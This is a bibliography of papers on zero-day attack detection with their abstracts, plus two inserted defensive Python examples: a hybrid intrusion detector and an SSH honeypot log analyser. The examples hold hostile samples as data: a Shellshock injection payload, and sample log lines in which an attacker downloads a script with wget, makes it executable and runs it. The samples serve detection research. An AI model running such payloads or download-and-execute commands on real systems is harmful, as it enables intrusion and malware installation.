Academic literature on the topic 'Known and Zero-Day Attacks Detection'


Journal articles on the topic "Known and Zero-Day Attacks Detection"

1

Sameera, Nerella, M. Siva Jyothi, K. Lakshmaji, and V. S. R. Pavan Kumar Neeli. "Clustering based Intrusion Detection System for effective Detection of known and Zero-day Attacks." Journal of Advanced Zoology 44, no. 4 (December 2, 2023): 969–75. http://dx.doi.org/10.17762/jaz.v44i4.2423.

Abstract:
Developing effective security measures is the most challenging task nowadays and hence calls for the development of intelligent intrusion detection systems. Most of the existing intrusion detection systems perform best at detecting known attacks but fail to detect zero-day attacks due to the lack of labeled examples. The authors of this paper come up with a clustering-based IDS framework that can effectively detect both known and zero-day attacks by following unsupervised machine learning techniques. This research uses the NSL-KDD dataset for experimentation, and the experimental results exhibit best performance with an accuracy of 78%.
2

Hindy, Hanan, Robert Atkinson, Christos Tachtatzis, Jean-Noël Colin, Ethan Bayne, and Xavier Bellekens. "Utilising Deep Learning Techniques for Effective Zero-Day Attack Detection." Electronics 9, no. 10 (October 14, 2020): 1684. http://dx.doi.org/10.3390/electronics9101684.

Abstract:
Machine Learning (ML) and Deep Learning (DL) have been used for building Intrusion Detection Systems (IDS). The increase in both the number and sheer variety of new cyber-attacks poses a tremendous challenge for IDS solutions that rely on a database of historical attack signatures. Therefore, the industrial pull for robust IDSs that are capable of flagging zero-day attacks is growing. Current outlier-based zero-day detection research suffers from high false-negative rates, thus limiting its practical use and performance. This paper proposes an autoencoder implementation for detecting zero-day attacks. The aim is to build an IDS model with high recall while keeping the miss rate (false negatives) to an acceptable minimum. Two well-known IDS datasets are used for evaluation: CICIDS2017 and NSL-KDD. In order to demonstrate the efficacy of our model, we compare its results against a One-Class Support Vector Machine (SVM). The manuscript highlights the performance of a One-Class SVM when zero-day attacks are distinctive from normal behaviour. The proposed model benefits greatly from the encoding-decoding capabilities of autoencoders. The results show that autoencoders are well suited to detecting complex zero-day attacks. The results demonstrate a zero-day detection accuracy of 89–99% for the NSL-KDD dataset and 75–98% for the CICIDS2017 dataset. Finally, the paper outlines the observed trade-off between recall and fallout.
3

Ohtani, Takahiro, Ryo Yamamoto, and Satoshi Ohzahata. "IDAC: Federated Learning-Based Intrusion Detection Using Autonomously Extracted Anomalies in IoT." Sensors 24, no. 10 (May 18, 2024): 3218. http://dx.doi.org/10.3390/s24103218.

Abstract:
The recent rapid growth in Internet of Things (IoT) technologies is enriching our daily lives but significant information security risks in IoT fields have become apparent. In fact, there have been large-scale botnet attacks that exploit undiscovered vulnerabilities, known as zero-day attacks. Several intrusion detection methods based on network traffic monitoring have been proposed to address this issue. These methods employ federated learning to share learned attack information among multiple IoT networks, aiming to improve collective detection capabilities against attacks including zero-day attacks. Although their ability to detect zero-day attacks with high precision has been confirmed, challenges such as autonomous labeling of attacks from traffic information and attack information sharing between different device types still remain. To resolve the issues, this paper proposes IDAC, a novel intrusion detection method with autonomous attack candidate labeling and federated learning-based attack candidate sharing. The labeling of attack candidates in IDAC is executed using information autonomously extracted from traffic information, and the labeling can also be applied to zero-day attacks. The federated learning-based attack candidate sharing enables candidate aggregation from multiple networks, and it executes attack determination based on the aggregated similar candidates. Performance evaluations demonstrated that IDS with IDAC within networks based on attack candidates is feasible and achieved comparable detection performance against multiple attacks including zero-day attacks compared to the existing methods while suppressing false positives in the extraction of attack candidates. In addition, the sharing of autonomously extracted attack candidates from multiple networks improves both detection performance and the required time for attack detection.
4

Hairab, Belal Ibrahim, Heba K. Aslan, Mahmoud Said Elsayed, Anca D. Jurcut, and Marianne A. Azer. "Anomaly Detection of Zero-Day Attacks Based on CNN and Regularization Techniques." Electronics 12, no. 3 (January 23, 2023): 573. http://dx.doi.org/10.3390/electronics12030573.

Abstract:
The rapid development of cyberattacks in the field of the Internet of things (IoT) introduces new security challenges regarding zero-day attacks. Intrusion-detection systems (IDS) are usually trained on specific attacks to protect the IoT application, but the attacks that are yet unknown to the IDS (i.e., zero-day attacks) still represent challenges and concerns regarding users' data privacy and security in those applications. Anomaly-detection methods usually depend on machine learning (ML)-based methods. Under the ML umbrella are classical ML-based methods, which are known to have low prediction quality and detection rates with regard to data they have not yet been trained on. Deep learning (DL)-based methods, especially convolutional neural networks (CNNs) with regularization methods, address this issue, give a better prediction quality with unknown data, and avoid overfitting. In this paper, we evaluate and prove that CNNs have a better ability to detect zero-day attacks, which are generated from non-bot attackers, compared to classical ML. We use classical ML, normal, and regularized CNN classifiers (L1- and L2-regularized). The training data consists of normal traffic data and DDoS attack data, as DDoS is the most common attack in the IoT. In order to give the full picture of this evaluation, the testing phase of those classifiers includes two scenarios, each having data with a different attack distribution. One of these is the backdoor attack, and the other is the scanning attack. The results of the testing prove that the regularized CNN classifiers still perform better than the classical ML-based methods in detecting zero-day IoT attacks.
5

Al-Rushdan, Huthifh, Mohammad Shurman, and Sharhabeel Alnabelsi. "On Detection and Prevention of Zero-Day Attack Using Cuckoo Sandbox in Software-Defined Networks." International Arab Journal of Information Technology 17, no. 4A (July 31, 2020): 662–70. http://dx.doi.org/10.34028/iajit/17/4a/11.

Abstract:
A network attacker may identify a network vulnerability within less than one day; this kind of attack is known as a zero-day attack. This vulnerability, undiscovered by vendors, empowers the attacker to affect or damage the network operation, because vendors have less than one day to fix this newly exposed vulnerability. The existing defense mechanisms against zero-day attacks focus on the prevention effort, in which unknown or new vulnerabilities typically cannot be detected. To the best of our knowledge, the protection mechanism against zero-day attacks is not widely investigated for Software-Defined Networks (SDNs). Thus, in this work we are motivated to develop a new zero-day attack detection and prevention mechanism for SDNs by modifying the Cuckoo sandbox tool. The mechanism is implemented and tested under a UNIX system. The experimental results show that our proposed mechanism successfully stops zero-day malware by isolating the infected clients, in order to prevent the malware from spreading to other clients. Moreover, results show the effectiveness of our mechanism in terms of detection accuracy and response time.
6

Alam, Naushad, and Muqeem Ahmed. "Zero-day Network Intrusion Detection using Machine Learning Approach." International Journal on Recent and Innovation Trends in Computing and Communication 11, no. 8s (August 18, 2023): 194–201. http://dx.doi.org/10.17762/ijritcc.v11i8s.7190.

Abstract:
Zero-day network attacks are a growing global cybersecurity concern. Hackers exploit vulnerabilities in network systems, making network traffic analysis crucial in detecting and mitigating unauthorized attacks. However, inadequate and ineffective network traffic analysis can lead to prolonged network compromises. To address this, machine learning-based zero-day network intrusion detection systems (ZDNIDS) rely on monitoring and collecting relevant information from network traffic data. The selection of pertinent features is essential for optimal ZDNIDS performance given the voluminous nature of network traffic data, characterized by attributes. Unfortunately, current machine learning models utilized in this field exhibit inefficiency in detecting zero-day network attacks, resulting in a high false alarm rate and overall performance degradation. To overcome these limitations, this paper introduces a novel approach combining the anomaly-based extended isolation forest algorithm with the BAT algorithm and Nevergrad. Furthermore, the proposed model was evaluated using 5G network traffic, showcasing its effectiveness in efficiently detecting both known and unknown attacks, thereby reducing false alarms when compared to existing systems. This advancement contributes to improved internet security.
7

Bu, Seok-Jun, and Sung-Bae Cho. "Deep Character-Level Anomaly Detection Based on a Convolutional Autoencoder for Zero-Day Phishing URL Detection." Electronics 10, no. 12 (June 21, 2021): 1492. http://dx.doi.org/10.3390/electronics10121492.

Abstract:
Considering the fatality of phishing attacks, the data-driven approach using massive URL observations has been verified, especially in the field of cyber security. On the other hand, the supervised learning approach relying on known attacks has limitations in terms of robustness against zero-day phishing attacks. Moreover, it is known that it is critical for the phishing detection task to fully exploit the sequential features from the URL characters. Taken together, to ensure both sustainability and intelligibility, we propose the combination of a convolution operation to model the character-level URL features and a deep convolutional autoencoder (CAE) to consider the nature of zero-day attacks. Extensive experiments on three real-world datasets consisting of 222,541 URLs showed the highest performance among the latest deep-learning methods. We demonstrated the superiority of the proposed method by receiver-operating characteristic (ROC) curve analysis in addition to 10-fold cross-validation and confirmed that the sensitivity improved by 3.98% compared to the latest deep model.
8

Ali, Shamshair, Saif Ur Rehman, Azhar Imran, Ghazif Adeem, Zafar Iqbal, and Ki-Il Kim. "Comparative Evaluation of AI-Based Techniques for Zero-Day Attacks Detection." Electronics 11, no. 23 (November 28, 2022): 3934. http://dx.doi.org/10.3390/electronics11233934.

Abstract:
Many intrusion detection and prevention systems (IDPS) have been introduced to identify suspicious activities. However, since attackers are exploiting new vulnerabilities in systems and are employing more sophisticated advanced cyber-attacks, these zero-day attacks remain hidden from IDPS in most cases. These features have incentivized many researchers to propose different artificial intelligence-based techniques to prevent, detect, and respond to such advanced attacks. This has also created a new requirement for a comprehensive comparison of the existing schemes in several aspects; after a thorough study we found that there currently exists no detailed comparative analysis of artificial intelligence-based techniques published in the last five years. Therefore, there is a need for this kind of work to be published, as there are many comparative analyses in other fields of cyber security that are available for readers to review. In this paper, we provide a comprehensive review of the latest and most recent literature, which introduces well-known machine learning and deep learning algorithms and the challenges they face in detecting zero-day attacks. Following these qualitative analyses, we present the comparative evaluation results regarding the highest accuracy, precision, recall, and F1 score compared to different datasets.
9

Rodríguez, Eva, Pol Valls, Beatriz Otero, Juan José Costa, Javier Verdú, Manuel Alejandro Pajuelo, and Ramon Canal. "Transfer-Learning-Based Intrusion Detection Framework in IoT Networks." Sensors 22, no. 15 (July 27, 2022): 5621. http://dx.doi.org/10.3390/s22155621.

Abstract:
Cyberattacks in the Internet of Things (IoT) are growing exponentially, especially zero-day attacks, mostly driven by security weaknesses in IoT networks. Traditional intrusion detection systems (IDSs) adopted machine learning (ML), especially deep learning (DL), to improve the detection of cyberattacks. DL-based IDSs require balanced datasets with large amounts of labeled data; however, there is a lack of such large collections in IoT networks. This paper proposes an efficient intrusion detection framework based on transfer learning (TL), knowledge transfer, and model refinement, for the effective detection of zero-day attacks. The framework is tailored to 5G IoT scenarios with unbalanced and scarce labeled datasets. The TL model is based on convolutional neural networks (CNNs). The framework was evaluated to detect a wide range of zero-day attacks. To this end, three specialized datasets were created. Experimental results show that the proposed TL-based framework achieves high accuracy and a low false prediction rate (FPR). The proposed solution has better detection rates for the different families of known and zero-day attacks than any previous DL-based IDS. These results demonstrate that TL is effective in the detection of cyberattacks in IoT environments.
10

Sheikh, Zakir Ahmad, Yashwant Singh, Pradeep Kumar Singh, and Paulo J. Sequeira Gonçalves. "Defending the Defender: Adversarial Learning Based Defending Strategy for Learning Based Security Methods in Cyber-Physical Systems (CPS)." Sensors 23, no. 12 (June 9, 2023): 5459. http://dx.doi.org/10.3390/s23125459.

Abstract:
Cyber-Physical Systems (CPS) are prone to many security exploitations due to a greater attack surface being introduced by their cyber component by the nature of their remote accessibility or non-isolated capability. Security exploitations, on the other hand, rise in complexities, aiming for more powerful attacks and evasion from detections. The real-world applicability of CPS thus poses a question mark due to security infringements. Researchers have been developing new and robust techniques to enhance the security of these systems. Many techniques and security aspects are being considered to build robust security systems; these include attack prevention, attack detection, and attack mitigation as security development techniques with consideration of confidentiality, integrity, and availability as some of the important security aspects. In this paper, we have proposed machine learning-based intelligent attack detection strategies which have evolved as a result of failures in traditional signature-based techniques to detect zero-day attacks and attacks of a complex nature. Many researchers have evaluated the feasibility of learning models in the security domain and pointed out their capability to detect known as well as unknown attacks (zero-day attacks). However, these learning models are also vulnerable to adversarial attacks like poisoning attacks, evasion attacks, and exploration attacks. To make use of a robust-cum-intelligent security mechanism, we have proposed an adversarial learning-based defense strategy for the security of CPS to ensure CPS security and invoke resilience against adversarial attacks. We have evaluated the proposed strategy through the implementation of Random Forest (RF), Artificial Neural Network (ANN), and Long Short-Term Memory (LSTM) on the ToN_IoT Network dataset and an adversarial dataset generated through the Generative Adversarial Network (GAN) model.

Dissertations / Theses on the topic "Known and Zero-Day Attacks Detection"

1

Toure, Almamy. "Collection, analysis and harnessing of communication flows for cyber-attack detection." Electronic Thesis or Diss., Valenciennes, Université Polytechnique Hauts-de-France, 2024. http://www.theses.fr/2024UPHF0023.

Abstract:
The increasing complexity of cyberattacks, characterized by a diversification of attack techniques, an expansion of attack surfaces, and growing interconnectivity of applications with the Internet, makes network traffic management in a professional environment imperative. Companies of all types collect and analyze network flows and logs to ensure the security of exchanged data and prevent the compromise of information systems. However, techniques for collecting and processing network traffic data vary from one dataset to another, and static attack detection approaches have limitations in terms of efficiency and precision, execution time, and scalability. This thesis proposes dynamic approaches for detecting cyberattacks related to network traffic, using feature engineering based on the different communication phases of a network flow, coupled with convolutional neural networks (1D-CNN) and their feature detector. This double extraction allows for better classification of network flows, a reduction in the number of attributes and model execution times, and thus effective attack detection. Companies also face constantly evolving cyber threats, and "zero-day" attacks that exploit previously unknown vulnerabilities are becoming increasingly frequent. Detecting these zero-day attacks requires constant technological monitoring and thorough but time-consuming analysis of the exploitation of these vulnerabilities. The proposed solutions mostly guarantee the detection of certain attack techniques. Therefore, we propose a detection framework for these attacks that covers the entire attack chain, from the data collection phase to the identification of any type of zero-day, even in a constantly evolving environment.
Finally, given the obsolescence of existing datasets and data generation techniques for intrusion detection, and the fixed, non-evolving, and non-exhaustive nature of recent attack scenarios, the study of an adapted synthetic data generator that guarantees data confidentiality is addressed. The solutions proposed in this thesis optimize the detection of known and zero-day attack techniques on network flows and improve the accuracy of models, while ensuring the confidentiality and high availability of data and models, with particular attention to the applicability of the solutions in a company network.
2

Khraisat, Ansam. "Intelligent zero-day intrusion detection framework for internet of things." Thesis, Federation University Australia, 2020. http://researchonline.federation.edu.au/vital/access/HandleResolver/1959.17/179729.

Abstract:
Zero-day intrusion detection system faces serious challenges as hundreds of thousands of new instances of malware are being created every day to cause harm or damage to the computer system. Cyber-attacks are becoming more sophisticated, leading to challenges in intrusion detection. There are many Intrusion Detection Systems (IDSs), which are proposed to identify abnormal activities, but most of these IDSs produce a large number of false positives and low detection accuracy. Hence, a significant quantity of false positives could generate a high-level of alerts in a short period of time as the normal activities are classified as intrusion activities. This thesis proposes a novel framework of hybrid intrusion detection system that integrates the Signature Intrusion Detection System (SIDS) with the Anomaly Intrusion Detection System (AIDS) to detect zero-day attacks with high accuracy. SIDS has been used to identify previously known intrusions, and AIDS has been applied to detect unknown zero-day intrusions. The goal of this research is to combine the strengths of each technique toward the development of a hybrid framework for the efficient intrusion detection system. A number of performance measures including accuracy, F-measure and area under ROC curve have been used to evaluate the efficacy of our proposed models and to compare and contrast with existing approaches. Extensive simulation results conducted in this thesis show that the proposed framework is capable of yielding excellent detection performance when tested with a number of widely used benchmark datasets in the intrusion detection system domain. Experiments show that the proposed hybrid IDS provides higher detection rate and lower false-positive rate in detecting intrusions as compared to the SIDS and AIDS techniques individually.
Doctor of Philosophy
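The hybrid SIDS + AIDS design described in the abstract above, together with the recall-versus-fallout trade-off that Hindy et al. (journal article 2 in this list) report for outlier-based zero-day detection, as an added, self-contained example rather than code from either work. A signature stage catches flows that match known rules; an anomaly stage scores every other flow against a profile learned from benign traffic only, so an attack no rule describes can still be flagged. A per-feature z-score profile stands in for the paper's autoencoder, and the flow records, the two signature rules and the thresholds are all constructed for this example (no real dataset is used); the sweep at the end shows how the anomaly threshold trades missed zero-day flows against false alarms.

```python
"""Hybrid signature + anomaly detection over constructed flow records (added example)."""
import math
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Flow:
    src: str
    dst_port: int
    packets: int
    byte_count: int
    duration_s: float
    syn_only: bool = False      # SYN seen, handshake never completed
    payload: bytes = b""        # first bytes of application data, if any


# --- Signature stage (SIDS): catches attacks we already know -----------------
# Hypothetical rules written for this example; real rule sets are far larger.
SIGNATURES = {
    "syn_flood": lambda f: f.syn_only and f.packets >= 50 and f.duration_s < 1.0,
    "shellshock_probe": lambda f: b"() { :;};" in f.payload,
}


def signature_match(flow):
    for name, rule in SIGNATURES.items():
        if rule(flow):
            return name
    return None


# --- Anomaly stage (AIDS): distance from a profile of benign traffic ---------
def features(flow):
    # log1p keeps one huge flow from swamping the z-scores of the others
    return (math.log1p(flow.packets), math.log1p(flow.byte_count),
            math.log1p(flow.duration_s * 1000))


class BenignProfile:
    """Per-feature mean and standard deviation learned from benign flows only."""

    def __init__(self, benign_flows):
        columns = list(zip(*(features(f) for f in benign_flows)))
        self.mu = [mean(c) for c in columns]
        self.sigma = [pstdev(c) or 1e-6 for c in columns]  # guard constant features

    def score(self, flow):
        # mean squared z-score: near 0 for "looks like training traffic", large for outliers
        return mean(((x - m) / s) ** 2 for x, m, s in zip(features(flow), self.mu, self.sigma))


def classify(flow, profile, threshold):
    sig = signature_match(flow)
    if sig:
        return "known:" + sig
    return "anomaly" if profile.score(flow) > threshold else "benign"


def evaluate(labelled_flows, profile, threshold):
    """Return (recall, false-positive rate) of the hybrid detector at one threshold."""
    tp = fn = fp = tn = 0
    for flow, is_attack in labelled_flows:
        flagged = classify(flow, profile, threshold) != "benign"
        if is_attack:
            tp, fn = (tp + 1, fn) if flagged else (tp, fn + 1)
        else:
            fp, tn = (fp + 1, tn) if flagged else (fp, tn + 1)
    recall = tp / (tp + fn) if tp + fn else 0.0
    fpr = fp / (fp + tn) if fp + tn else 0.0
    return recall, fpr


# Constructed data: a tight cluster of ordinary HTTPS flows for training ...
BENIGN_TRAIN = [
    Flow("10.0.0.5", 443, 20, 15000, 1.0), Flow("10.0.0.6", 443, 25, 18000, 1.2),
    Flow("10.0.0.7", 443, 30, 22000, 0.8), Flow("10.0.0.8", 443, 18, 12000, 1.5),
    Flow("10.0.0.9", 443, 22, 16000, 1.1), Flow("10.0.0.10", 443, 28, 20000, 0.9),
]
# ... and a test set: two benign flows (one slightly heavier), two attacks the
# signatures know, and a large exfiltration flow no signature describes (the "zero-day").
TEST_SET = [
    (Flow("10.0.0.11", 443, 24, 17000, 1.0), False),
    (Flow("10.0.0.12", 443, 32, 24000, 0.9), False),
    (Flow("198.51.100.9", 80, 500, 20000, 0.5, syn_only=True), True),
    (Flow("198.51.100.10", 80, 5, 600, 0.1, payload=b"() { :;}; /bin/sh -c id"), True),
    (Flow("10.0.0.13", 4444, 4000, 6_000_000, 40.0), True),
]
PROFILE = BenignProfile(BENIGN_TRAIN)

if __name__ == "__main__":
    for flow, _ in TEST_SET:
        print(flow.src, round(PROFILE.score(flow), 2), classify(flow, PROFILE, 9.0))
    for t in (1.0, 9.0, 5000.0):
        print("threshold", t, "recall/fpr", evaluate(TEST_SET, PROFILE, t))
```

The exfiltration flow never touches a signature; only the anomaly stage sees it, which is the whole point of the hybrid. Dropping the threshold from 9.0 to 1.0 does not change recall here but starts flagging the heavier benign flow (fallout rises); raising it to 5000 silences the false alarm and loses the zero-day flow instead. Picking that operating point from benign-only training data, as the abstracts above note, is where such systems stand or fall in practice.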
3

Peddisetty, Naga Raju. "State-of-the-art Intrusion Detection: Technology, Challenges, and Evaluation." Thesis, Linköping University, Department of Electrical Engineering, 2005. http://urn.kb.se/resolve?urn=urn:nbn:se:liu:diva-2792.

Abstract:
Due to the invention of automated hacking tools, hacking is not a black art anymore. Even script kiddies can launch attacks in a few seconds. Therefore, there is a great emphasis on security to protect resources from camouflage. An Intrusion Detection System is also one weapon in the security arsenal. It is the process of monitoring and analyzing information sources in order to detect vicious traffic. With its unique capabilities like monitoring, analyzing, detecting and archiving, IDS assists organizations to combat threats, to have a snapshot of the networks, and to conduct forensic analysis. Unfortunately there are myriad products in the market. Selecting the right product at the right time is difficult. Due to the widespread rumors and paranoia, in this work I have presented the state-of-the-art IDS technologies, assessed the products, and evaluated them. I have also presented some of the novel challenges that IDS products are suffering. This work will be a great help for pursuing IDS technology and for deploying Intrusion Detection Systems in an organization. It also gives in-depth knowledge of the present IDS challenges.

Book chapters on the topic "Known and Zero-Day Attacks Detection"

1

Wang, Lingyu, Mengyuan Zhang, and Anoop Singhal. "Network Security Metrics: From Known Vulnerabilities to Zero Day Attacks." In Lecture Notes in Computer Science, 450–69. Cham: Springer International Publishing, 2018. http://dx.doi.org/10.1007/978-3-030-04834-1_22.

2

Hamid, Khalid, Muhammad Waseem Iqbal, Muhammad Aqeel, Xiangyong Liu, and Muhammad Arif. "Analysis of Techniques for Detection and Removal of Zero-Day Attacks (ZDA)." In Communications in Computer and Information Science, 248–62. Singapore: Springer Nature Singapore, 2023. http://dx.doi.org/10.1007/978-981-99-0272-9_17.

3

Ngo, Quoc-Dung, and Quoc-Huu Nguyen. "A Reinforcement Learning-Based Approach for Detection Zero-Day Malware Attacks on IoT System." In Artificial Intelligence Trends in Systems, 381–94. Cham: Springer International Publishing, 2022. http://dx.doi.org/10.1007/978-3-031-09076-9_34.

4

Singh, Mahendra Pratap, Virendra Pratap Singh, and Maanak Gupta. "Early Detection and Classification of Zero-Day Attacks in Network Traffic Using Convolutional Neural Network." In Lecture Notes in Networks and Systems, 812–22. Cham: Springer Nature Switzerland, 2024. http://dx.doi.org/10.1007/978-3-031-60935-0_70.

5

Jorquera Valero, José María, Manuel Gil Pérez, Alberto Huertas Celdrán, and Gregorio Martínez Pérez. "Identification and Classification of Cyber Threats Through SSH Honeypot Systems." In Handbook of Research on Intrusion Detection Systems, 105–29. IGI Global, 2020. http://dx.doi.org/10.4018/978-1-7998-2242-4.ch006.

Abstract:
As the number and sophistication of cyber threats increase year after year, security systems such as antivirus, firewalls, or Intrusion Detection Systems based on misuse detection techniques are improved in their detection capabilities. However, these traditional systems are usually limited in detecting potential threats, since they are inadequate to spot zero-day attacks or mutations in behaviour. The authors propose using honeypot systems as a further security layer able to provide a holistic intelligence level in detecting unknown threats, or well-known attacks with new behaviour patterns. Since brute-force attacks have been increasing in recent years, the authors opted for an SSH medium-interaction honeypot to acquire a log set from attackers' interactions. The proposed system is able to acquire the behaviour patterns of each attacker and link them with future sessions for early detection. The authors also generate a feature set to feed Machine Learning algorithms with the main goal of identifying and classifying attackers' sessions, and thus be able to learn the malicious intentions behind executing cyber threats.
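The session-level feature extraction and cross-session linking outlined in the abstract above, as an added example that is not the chapter's own code. It parses a constructed honeypot excerpt in a hypothetical one-event-per-line format (not any real honeypot's output), builds a per-session feature vector of the kind one would feed to a classifier, fingerprints the normalized command sequence so the same playbook is recognised when it arrives from a new source address, and applies a hypothetical three-label rule set where the chapter uses trained machine-learning models.

```python
"""Per-session features and behaviour fingerprints from SSH honeypot logs (added example)."""
import hashlib
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime

# Constructed log excerpt in a hypothetical one-event-per-line format (not a real tool's output).
LOG = """\
2024-05-01T10:00:01 session=s1 src=198.51.100.7 event=login user=root pass=123456 result=failed
2024-05-01T10:00:03 session=s1 src=198.51.100.7 event=login user=root pass=admin result=success
2024-05-01T10:00:05 session=s1 src=198.51.100.7 event=cmd input="uname -a"
2024-05-01T10:00:06 session=s1 src=198.51.100.7 event=cmd input="wget http://203.0.113.9/x.sh -O /tmp/x"
2024-05-01T10:00:08 session=s1 src=198.51.100.7 event=cmd input="chmod +x /tmp/x; /tmp/x"
2024-05-01T10:00:09 session=s1 src=198.51.100.7 event=close
2024-05-01T11:30:00 session=s2 src=192.0.2.44 event=login user=admin pass=admin result=failed
2024-05-01T11:30:01 session=s2 src=192.0.2.44 event=login user=admin pass=password result=failed
2024-05-01T11:30:02 session=s2 src=192.0.2.44 event=close
2024-05-02T02:10:00 session=s3 src=203.0.113.77 event=login user=root pass=toor result=success
2024-05-02T02:10:02 session=s3 src=203.0.113.77 event=cmd input="uname -a"
2024-05-02T02:10:03 session=s3 src=203.0.113.77 event=cmd input="wget http://198.51.100.200/bot.sh -O /tmp/y"
2024-05-02T02:10:05 session=s3 src=203.0.113.77 event=cmd input="chmod +x /tmp/y; /tmp/y"
2024-05-02T02:10:06 session=s3 src=203.0.113.77 event=close
"""

LINE = re.compile(r"^(?P<ts>\S+) session=(?P<sid>\S+) src=(?P<src>\S+) event=(?P<ev>\S+)(?P<rest>.*)$")
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')  # key=value or key="quoted value"


@dataclass
class Session:
    sid: str
    src: str
    started: datetime
    ended: datetime
    login_attempts: int = 0
    failed_logins: int = 0
    commands: list = field(default_factory=list)


def parse_events(log_text):
    """Yield (timestamp, session id, source ip, event type, fields) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # tolerate junk lines rather than crash on them
        fields = {k: v.strip('"') for k, v in KV.findall(m["rest"])}
        yield datetime.fromisoformat(m["ts"]), m["sid"], m["src"], m["ev"], fields


def extract_sessions(log_text):
    """Fold the event stream into one Session record per session id."""
    sessions = {}
    for ts, sid, src, ev, fields in parse_events(log_text):
        s = sessions.setdefault(sid, Session(sid, src, ts, ts))
        s.ended = max(s.ended, ts)
        if ev == "login":
            s.login_attempts += 1
            if fields.get("result") != "success":
                s.failed_logins += 1
        elif ev == "cmd":
            s.commands.append(fields.get("input", ""))
    return sessions


def normalize(cmd):
    """Strip per-campaign specifics (download URL, dropped file name) so the same tooling matches."""
    cmd = re.sub(r"https?://\S+", "<URL>", cmd)
    cmd = re.sub(r"/tmp/[\w.-]+", "<PATH>", cmd)
    return re.sub(r"\s+", " ", cmd).strip()


def fingerprint(session):
    """Hash of the normalized command sequence; equal for sessions that run the same playbook."""
    seq = "\n".join(normalize(c) for c in session.commands)
    return hashlib.sha256(seq.encode()).hexdigest()[:16]


def features(session):
    return {
        "duration_s": (session.ended - session.started).total_seconds(),
        "login_attempts": session.login_attempts,
        "failed_logins": session.failed_logins,
        "n_commands": len(session.commands),
        "n_distinct_commands": len({normalize(c) for c in session.commands}),
        "downloads": sum(1 for c in session.commands if re.match(r"\s*(wget|curl)\b", c)),
    }


def classify(feat):
    """Coarse intent label (hypothetical rules; the chapter trains ML classifiers instead)."""
    if feat["n_commands"] == 0:
        return "credential-guessing"
    if feat["downloads"] > 0:
        return "malware-dropper"
    return "interactive-recon"


def link_sessions(sessions):
    """Group session ids by fingerprint so a new session can be tied to earlier ones."""
    groups = defaultdict(list)
    for s in sessions.values():
        groups[fingerprint(s)].append(s.sid)
    return dict(groups)


if __name__ == "__main__":
    sessions = extract_sessions(LOG)
    for sid, s in sessions.items():
        f = features(s)
        print(sid, s.src, fingerprint(s), classify(f), f)
    print(link_sessions(sessions))
```

Sessions s1 and s3 come from different addresses and fetch different URLs, yet normalization collapses both to the same three-step sequence, so they share a fingerprint and are linked; s2 never gets past the login prompt and is labelled as credential guessing from its feature vector alone. In a deployment the normalization rules are the part that needs the most care: too aggressive and unrelated campaigns collide, too literal and a one-byte change in the dropper URL breaks the link.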
6

Roseline, S. Abijah, and S. Geetha. "Intelligent Malware Detection Using Deep Dilated Residual Networks for Cyber Security." In Countering Cyber Attacks and Preserving the Integrity and Availability of Critical Systems, 211–29. IGI Global, 2019. http://dx.doi.org/10.4018/978-1-5225-8241-0.ch011.

Abstract:
Malware is the most serious security threat, which possibly targets billions of devices like personal computers, smartphones, etc. across the world. Malware classification and detection is a challenging task due to the targeted, zero-day, and stealthy nature of advanced and new malware. Traditional signature detection methods like antivirus software were effective for detecting known malware. At present, there are various solutions for the detection of such unknown malware employing feature-based machine learning algorithms. Machine learning techniques detect known malware effectively but are not optimal and show a low accuracy rate for unknown malware. This chapter explores a novel deep learning model called the deep dilated residual network model for malware image classification. The proposed model showed a higher accuracy of 98.50% and 99.14% on the Kaggle Malimg and BIG 2015 datasets, respectively. New malware can be handled in real time with minimal human interaction using the proposed deep residual model.
7

Thapa, Vidhanth Maan, Sudhanshu Srivastava, and Shelly Garg. "Zero Day Vulnerabilities Assessments, Exploits Detection, and Various Design Patterns in Cyber Software." In AI Tools for Protecting and Preventing Sophisticated Cyber Attacks, 132–47. IGI Global, 2023. http://dx.doi.org/10.4018/978-1-6684-7110-4.ch006.

Abstract:
In this technology-driven era, software development and maintenance is a rapidly growing domain and is predestined to thrive over the coming decade. But the growing demand for software solutions also brings its own implications. Software vulnerabilities are the most crucial of these. Software vulnerabilities can be referred to as weaknesses or shortcomings of software solutions which increase the risks of exploitation of resources and information. In the past few years, the number of exploits has been increasing rapidly, reaching an all-time high in 2021 and affecting more than 100 million people worldwide. Even with the presence of existing vulnerability management models and highly secure tools and frameworks, software vulnerabilities are hard to identify and resolve, as they may not be independent, and resolving them may cause other vulnerabilities. Moreover, a majority of exploits are caused by known vulnerabilities and zero-day vulnerabilities.
8

Sethuraman, Murugan Sethuraman. "Survey of Unknown Malware Attack Finding." In Advances in Systems Analysis, Software Engineering, and High Performance Computing, 260–76. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-3129-6.ch011.

Abstract:
Intrusion detection systems (IDS) have played a vital role as a device to guard our networks from unknown malware attacks. However, since they still suffer from detecting an unknown attack, i.e., a 0-day attack, the ultimate challenge in the intrusion detection field is how we can precisely identify such an attack. This chapter will analyze the various unknown malware activities during networking, internet, or remote connection. For identifying known malware, various tools are available, but they do not detect unknown malware exactly. It will vary according to connectivity, the tools used, and the finding strategies used. Anyhow, like known malware, a few unknown malware are listed according to their abnormal activities and changes in the system. In this chapter, we will see the various unknown methods and the preventions for avoiding them, in a bird's-eye-view manner.
9

Sethuraman, Murugan Sethuraman. "Survey of Unknown Malware Attack Finding." In Intelligent Systems, 2227–43. IGI Global, 2018. http://dx.doi.org/10.4018/978-1-5225-5643-5.ch099.

Abstract:
Intrusion detection systems (IDS) have played a vital role as a device to guard our networks from unknown malware attacks. However, since they still suffer from detecting an unknown attack, i.e., a 0-day attack, the ultimate challenge in the intrusion detection field is how we can precisely identify such an attack. This chapter will analyze the various unknown malware activities during networking, internet, or remote connection. For identifying known malware, various tools are available, but they do not detect unknown malware exactly. It will vary according to connectivity, the tools used, and the finding strategies used. Anyhow, like known malware, a few unknown malware are listed according to their abnormal activities and changes in the system. In this chapter, we will see the various unknown methods and the preventions for avoiding them, in a bird's-eye-view manner.
10

Stewart, Andrew J. "Vulnerability Disclosure, Bounties, and Markets." In A Vulnerable System, 127–51. Cornell University Press, 2021. http://dx.doi.org/10.7591/cornell/9781501758942.003.0008.

Abstract:
